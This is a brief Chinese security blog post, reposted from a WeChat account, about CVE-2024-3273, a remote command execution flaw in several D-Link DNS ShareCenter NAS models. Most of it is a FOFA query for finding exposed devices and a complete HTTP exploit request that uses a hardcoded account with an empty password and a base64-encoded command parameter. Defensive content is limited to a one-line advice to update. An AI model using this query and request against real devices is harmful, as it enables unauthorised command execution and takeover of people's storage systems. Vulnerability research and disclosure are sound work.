0x01 前言
0x02 影响平台
DNS-340L、DNS-320L、DNS-327L、DNS-3250x03 漏洞复现
搜索语法
FOFA:product="D_Link-DNS-ShareCenter""Text:In order to access the ShareCenter, please make sure you are using a recent browser(IE 7+, Firefox 3+, Safari 4+, Chrome 3+, Opera 10+)"
页面是这个酱紫
EXP如下:
GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=cHdk HTTP/1.1Host: ip:portUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close
Success~
0x04 修复方案
建议及时更新至最新版本!
原文始发于微信公众号(渗透Xiao白帽):CVE-2024-3273 远程命令执行漏洞(附EXP)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论